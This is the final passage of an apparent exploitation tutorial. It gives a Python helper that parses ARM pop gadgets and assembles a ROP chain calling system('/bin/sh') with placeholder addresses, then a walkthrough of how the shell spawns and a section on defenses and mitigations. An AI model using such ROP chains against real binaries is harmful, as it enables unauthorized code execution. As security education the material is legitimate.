- Fills unused registers with dummy values
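The two steps described above can be sketched independently of rop.py. The names, the sample objdump line, and the addresses below are all illustrative placeholders. Whether the gadget address itself also needs the Thumb bit depends on how that part of libc was compiled, so this sketch leaves the gadget address exactly as the caller passes it.

```python
import re
import struct

DUMMY = 0x41414141  # filler for registers we do not care about


def parse_pop_regs(disasm_line):
    """Return the register list of a 'pop {...}' line, or None if there is none."""
    match = re.search(r"pop\s*\{([^}]*)\}", disasm_line)
    if not match:
        return None
    return [reg.strip() for reg in match.group(1).split(",")]


def is_usable(regs):
    """Need r0 (argument) and pc (jump target); sp would corrupt our stack."""
    return regs is not None and "r0" in regs and "pc" in regs and "sp" not in regs


def build_arm_chain(gadget_addr, regs, binsh_addr, system_addr, thumb=True):
    """Gadget address followed by one 32-bit value per popped register.

    pop loads the lowest-numbered register from the lowest address, so the
    disassembly order of `regs` matches the order of values on the stack.
    """
    chain = struct.pack("<I", gadget_addr)
    for reg in regs:
        if reg == "r0":
            value = binsh_addr
        elif reg == "pc":
            value = (system_addr | 1) if thumb else system_addr
        else:
            value = DUMMY
        chain += struct.pack("<I", value)
    return chain


regs = parse_pop_regs("   18084:\te8bd8011 \tpop\t{r0, r4, pc}")  # sample line
chain = build_arm_chain(0xb6e18084, regs, 0xb6f2a000, 0xb6e3b000)  # placeholder addresses
print(regs, len(chain))  # ['r0', 'r4', 'pc'] 16
```

Preferring the gadget with the fewest registers keeps the chain short, since every extra register costs one more dummy word on the stack.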
Using rop.py for ARM:
When executed:
- Overflow overwrites return address with gadget address
- Function returns to gadget
- Gadget pops /bin/sh address into r0, dummy values into other registers, system() address into pc
- Execution jumps to system() with r0 = "/bin/sh"
- Shell spawns!
ARM ROP is a bit of a pain in the ass due to its register-based calling convention, but at least we now have some basic automation for it.
Defensive perspective
You now understand how to exploit binaries, at least at a basic level. Modern exploitation typically uses ROP or variants (JOP, SROP) because executable stacks are rare in production systems. However, understanding NOP sleds is pedagogically valuable and still relevant for embedded systems or legacy software.
Understanding exploitation techniques also tells you a lot about how to defend against them. Defenses you have now seen in action include:
- Bounds checking: Always use length-bounded string functions (strncpy, fgets, snprintf), keeping in mind that strncpy does not null-terminate the destination when the source fills it
- Stack canaries: Modern compilers insert random values before return addresses; corruption is then detected before return
- DEP/NX bit: Marks the stack and heap as non-executable
- ASLR: Randomizes memory layout to make addresses unpredictable
Additionally, some other things we haven't explicitly covered are:
- CFI (Control Flow Integrity): Ensures program control flow matches intended behavior
- Static analysis: Tools like clang-tidy, cppcheck detect unsafe function usage
- Fuzzing: Automated testing with malformed inputs to discover vulnerabilities
Although we haven't seen much of these ourselves, you'll find a ton of literature on these topics if you look them up.
Keep in mind, though, that no single mitigation is perfect. Hackers are surprisingly crafty and sometimes heavily funded and well-equipped (think nation states). Defense in depth (multiple layers) is always critical.
If you want to learn more about security and the fundamental principles, I would highly recommend Computer Security and the Internet: Tools and Jewels by Paul C. van Oorschot.
Next steps
If you made it to the end of this post, congrats! We covered a lot of information: we explored shellcode development and two exploitation techniques (NOP sleds and ROP) for both x86 and ARM, and we even developed some swanky Python scripts to automate some of these processes. In Part 4, we'll shift focus to heap-based vulnerabilities on ARM (and only ARM, because x86 is meh). Onwards!
References
- The Shellcoder's Handbook - Chris Anley, John Heasman, Felix Lindner, Gerardo Richarte
- Hacking: The Art of Exploitation (2nd Edition) - Jon Erickson
- Linux Syscall Reference
- X86 Assembly/Interfacing with Linux - Wikibooks
- Intel 64 and IA-32 Architectures Software Developer's Manual
- Azeria Labs: ARM Assembly Basics
- Exploit Database: x86 execve shellcode
- Exploit Database: ARM execve shellcode
- A Short Guide on ARM Exploitation - Aditya Gupta
- ARM shellcode and exploit development - Andrea Sindoni (BSides Munich 2018)
- Python ctypes documentation
- Computer Security and the Internet: Tools and Jewels - Paul C. van Oorschot